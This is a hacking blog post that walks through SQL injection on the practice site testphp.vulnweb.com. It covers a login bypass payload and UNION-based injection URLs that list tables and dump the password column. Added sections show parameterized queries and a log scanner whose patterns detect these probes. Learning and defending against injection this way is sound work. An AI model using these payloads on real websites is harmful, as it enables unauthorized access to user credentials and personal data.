SQL Injection Vulnerability

Hello Hackers,

Let's read some cybersecurity blogs.

There are many vulnerabilities in websites; in that list, the SQLi vulnerability comes up with a CRITICAL severity...

In this vulnerability the database is exposed through the web application: a crafted SQL query gives up the information of all databases. This occurs in two places:

  • On Login pages
  • On a URL parameter (php?*=)

The most famous parameter for SQLi is php?id=. We follow some SQL queries to view the database. There are two ways:

  • Using automated tools (SQLmap)
  • Performing manual SQLi

Most people prefer manual injection because the automated tools make noise while injecting, and the website may block the user for the illegal activity...

For now, we are using the website "testphp.vulnweb.com", which is made for practicing vulnerability hunting and exploitation...

First, we will try the login page. The SQLi query there is 1' or '1'='1. This payload is injected because the backend query wraps our input in single quotes (' '), so the payload closes that quote and appends a condition that makes the statement "TRUE". After putting in this payload, the final query at the backend ends with '1' or '1'='1'. I have used the "or" conjunction because with "or" the overall condition is true if only one of its conditions is true.

In the above payload, 1=1 is always true, so the whole query is true and you are logged in to someone's account...

Once you have injected the 1' or '1'='1 query, hit enter... and boom!! you are logged in.
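As an added example (not code from the original post), here is the login check described above in Python, with an in-memory SQLite table standing in for the site's backend (an assumption): the string-built query lets 1' or '1'='1 pass as a password, while the parameter-bound version treats the same text as a literal string.

```python
import sqlite3

PAYLOAD = "1' or '1'='1"   # the login payload from the post


def make_db():
    """Constructed in-memory users table (assumption: stands in for the site's DB)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uname TEXT, pass TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")
    return conn


def login_vulnerable(conn, uname, pwd):
    """Builds the WHERE clause by string concatenation, as the post's target does.

    With pwd = 1' or '1'='1 the clause becomes
        uname='x' AND pass='1' or '1'='1'
    AND binds tighter than OR, so the trailing '1'='1' makes it true for any user.
    """
    sql = f"SELECT uname FROM users WHERE uname='{uname}' AND pass='{pwd}'"
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, uname, pwd):
    """Same query with bound parameters: the quotes in pwd are data, never SQL."""
    sql = "SELECT uname FROM users WHERE uname=? AND pass=?"
    return conn.execute(sql, (uname, pwd)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload :", login_vulnerable(db, "anyone", PAYLOAD))  # True
    print("safe, payload       :", login_safe(db, "anyone", PAYLOAD))        # False
```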

That ends the login page SQLi; now we move towards URL-based SQL injection. After doing some recon I got a URL with the parameter "php?artist=1".

Once I found this, I immediately put an apostrophe (') after the 1 to check whether it is vulnerable to SQL injection or not. If it is vulnerable it will show a MySQL error, or some objects or contents will disappear, which shows that it is vulnerable to SQLi.

http://testphp.vulnweb.com/artists.php?artist=1'

When we have confirmed that it is vulnerable, we need to fix the query so that all the content that disappeared can be seen again... For fixing that we have many ways, like "-- -", "/", etc. If you do not remember the payloads you can use a cheatsheet from GitHub or other sources.

http://testphp.vulnweb.com/artists.php?artist=-1

It got fixed: the MySQL error is gone, which means SQLi is working here...

Now we need to find the number of columns the page's query selects, which we can find with an "ORDER BY" query: we test "order by 1", "order by 2", and so on, until we get an error or the same situation as in step 1.

Once the error is shown, that means the columns end there. On this website we have only got 3 columns.

http://testphp.vulnweb.com/artists.php?artist=-1 order by 3

We get an error for anything beyond order by 3.

Once we have the number of columns, we need to check which of them are vulnerable (reflected in the page). For that we have the "UNION SELECT" query, like "union select 1,2,3": after union select we write one number for each column... and it's done.

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,3

We have found that columns 2 and 3 are vulnerable, so they get reflected in the body of the website.

Now we should find out the current version and current user of the database. For that we have the query "union select 1,current_user(),version()": we place our query in whichever column positions are vulnerable. Here 2 and 3 are vulnerable, so I replaced them with the new query for what I wanted to find from the database.

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,current_user(),version()

Here we got our user and version.

Now it's time to find out the table names from the database. For this we have the query "group_concat(table_name)".

Here we will use "information_schema", which is a default database present in every MySQL server...

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()

Success!! We have found all the table names present in the database. Now it's time to find the columns of any one table; I have chosen "users", as it contains sensitive data...

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'

Now we have the columns that store the sensitive data. They contain all the users' data, which we can simply access one by one to retrieve more... I am going to view "pass".

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(pass),3 from users

Now, if you want any other specific data, you can easily find it from the same query: replace "pass" in "group_concat(pass),3 from users" with email, phone, uname, name, or cc and you will get that data reflected in the body of the website...
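From the defender's side, here is an added example (not from the original post) that scans constructed access-log lines for the probe sequence this walkthrough uses: the apostrophe test, ORDER BY column counting, UNION SELECT, and information_schema reads. The log lines, the IP addresses and the rule patterns are my own assumptions, and the last log line shows the false positive the bare-quote rule produces on a legitimate value.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Probe patterns, in the order the walkthrough uses them (assumption: these tokens
# never appear in legitimate values for this application's parameters).
PROBES = [
    ("quote-probe", re.compile(r"'")),
    ("order-by", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema-read", re.compile(r"\binformation_schema\.", re.I)),
]
REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')


def scan_request(target):
    """Return [(param, rule)] for each decoded query parameter that matches a probe."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        hits.extend((name, rule) for rule, pat in PROBES if pat.search(value))
    return hits


def scan_log(text):
    """Return (client_ip, target, hits) for every access-log line carrying a probe."""
    flagged = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m and (hits := scan_request(m.group("target"))):
            flagged.append((line.split()[0], m.group("target"), hits))
    return flagged


# Constructed sample log (Common Log Format): the first five requests replay the
# post's sequence; the last is a legitimate value that the quote rule also flags.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /artists.php?artist=1 HTTP/1.1" 200 5120
198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /artists.php?artist=1%27 HTTP/1.1" 200 2210
198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /artists.php?artist=-1+order+by+3 HTTP/1.1" 200 2210
198.51.100.7 - - [01/Jan/2024:10:00:14 +0000] "GET /artists.php?artist=-1+union+select+1,2,3 HTTP/1.1" 200 5301
198.51.100.7 - - [01/Jan/2024:10:00:20 +0000] "GET /artists.php?artist=-1+union+select+1,group_concat(table_name),3+from+information_schema.tables HTTP/1.1" 200 5400
203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /search.php?q=O%27Brien HTTP/1.1" 200 3000
"""

if __name__ == "__main__":
    for ip, target, hits in scan_log(SAMPLE_LOG):
        print(ip, target, [rule for _, rule in hits])
```

Correlating the flagged lines by client IP over a short window (a quote probe followed by ORDER BY and UNION SELECT from the same address) separates a real probing session from a lone O'Brien.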

Once you find this on any actual live website, kindly report it to the owner; in return they will give you a bounty or swag as a reward... Do not misuse the data you have collected...

It's done for today. "GOOD BYE" for now.

This is only for educational purposes!!

Happy Hacking!!

5 comments

  1. I simply could not depart your web site prior to suggesting that I actually enjoyed the standard information an individual provides for your visitors. I am gonna be back incessantly to inspect new posts.

    1. Actually I am busy with some of my projects and exams, that's why I have not been able to post a blog for some days, but don't worry, within 10 working days we will be back again with our blogs...

  2. I simply couldn't leave your website prior to suggesting that I extremely loved the standard information a person provides for your visitors. I am gonna be back continuously to inspect new posts.

  3. Wow, fantastic blog layout! How long have you been running a blog for? You make blogging look easy. The overall look of your web site is excellent, as is the content.
